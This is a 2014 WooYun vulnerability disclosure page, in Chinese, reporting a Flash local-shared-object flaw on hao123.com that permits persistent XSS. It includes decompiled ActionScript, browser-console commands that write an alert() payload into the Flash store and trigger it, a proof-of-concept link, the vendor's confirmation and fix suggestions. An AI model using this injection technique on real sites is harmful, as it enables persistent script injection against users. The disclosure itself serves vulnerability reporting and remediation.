Flash漏洞导致Hao123 XSS Rootkit | wooyun-2014-065197| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065197

漏洞标题：Flash漏洞导致Hao123 XSS Rootkit

漏洞作者： iv4n

提交时间：2014-06-19 15:27

修复时间：2014-08-03 15:28

公开时间：2014-08-03 15:28

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-19：细节已通知厂商并且等待厂商处理中
2014-06-19：厂商已经确认，细节仅向厂商公开
2014-06-29：细节向核心白帽子及相关领域专家公开
2014-07-09：细节向普通白帽子公开
2014-07-19：细节向实习白帽子公开
2014-08-03：细节向公众公开

简要描述：

Flash LSO的漏洞，Hao123.com受影响

详细说明：

下午看到neobyte的一个漏洞 WooYun: 一个flash的0day导致的淘宝网存储xss(可形成永久后门) 比较有意思，晚上动手看了下，hao123存在同样的问题（js调用LSO读取数据的问题）。
Flash的名字很给力：

看了下源码，Security.allowDomain("*"); 有戏！
基本上就是简单的封装LSO的方法，这里看下write：

public function write(param1:String, param2:String, param3) : Boolean
        {
            var so:SharedObject;
            var result:String;
            var id:* = param1;
            var key:* = param2;
            var value:* = param3;
            var isWriteOK:Boolean;
            try
            {
                so = SharedObject.getLocal(id);
                so.data[key] = value;
                result = so.flush();
                if (result == SharedObjectFlushStatus.PENDING)
                {
                    isWriteOK;
                }
            }
            catch (err:Error)
            {
                isWriteOK;
            }
            return isWriteOK;
        }// end function

三个参数，id，key,value。这里可以从从本地文件找到相关信息：
windows8，chrome中Flash LSO在这里
C:\Users\ivanl_000\AppData\Local\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\HBLU43EP\s1.hao123img.com\index\swf\LocalStorage.swf\ $hao123$.sol

直接在当前站点进行尝试利用，在Chrome控制台先读一下：

document.embeds["flashStorage"].read('$hao123$',"FLASHID")

再写入：

document.embeds["flashStorage"].write('$hao123$', 'FLASHID', '\\";alert(document.domain);//a');

返回成功，再利用读取触发漏洞：

document.embeds["flashStorage"].read('$hao123$',"FLASHID")

然后参考neobyte的代码，写出poc，搞定。

漏洞证明：

先访问这个：
http://1v4n.sinaapp.com/poc/hao123.html
再访问这个：
http://www.hao123.com/
触发。
说明：
hao123页面的流程会先读取，然后重新写入会覆盖FLASHID。
要保证rootkit XSS需要在读取执行JS的时候，搞定后面写入操作即可。

修复方案：

1.Security.allowDomain("*"); 限制；
2.callback的值也要进行过滤处理：注意\.

版权声明：转载请注明来源 iv4n@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-06-19 19:01

厂商回复：

我们会尽快处理此问题，感谢对百度安全的关注。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065197

漏洞标题：Flash漏洞导致Hao123 XSS Rootkit

相关厂商：百度

漏洞作者： iv4n

提交时间：2014-06-19 15:27

修复时间：2014-08-03 15:28

公开时间：2014-08-03 15:28

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 iv4n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065197

漏洞标题：Flash漏洞导致Hao123 XSS Rootkit

相关厂商：百度

漏洞作者： iv4n

提交时间：2014-06-19 15:27

修复时间：2014-08-03 15:28

公开时间：2014-08-03 15:28

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-065197"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 iv4n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：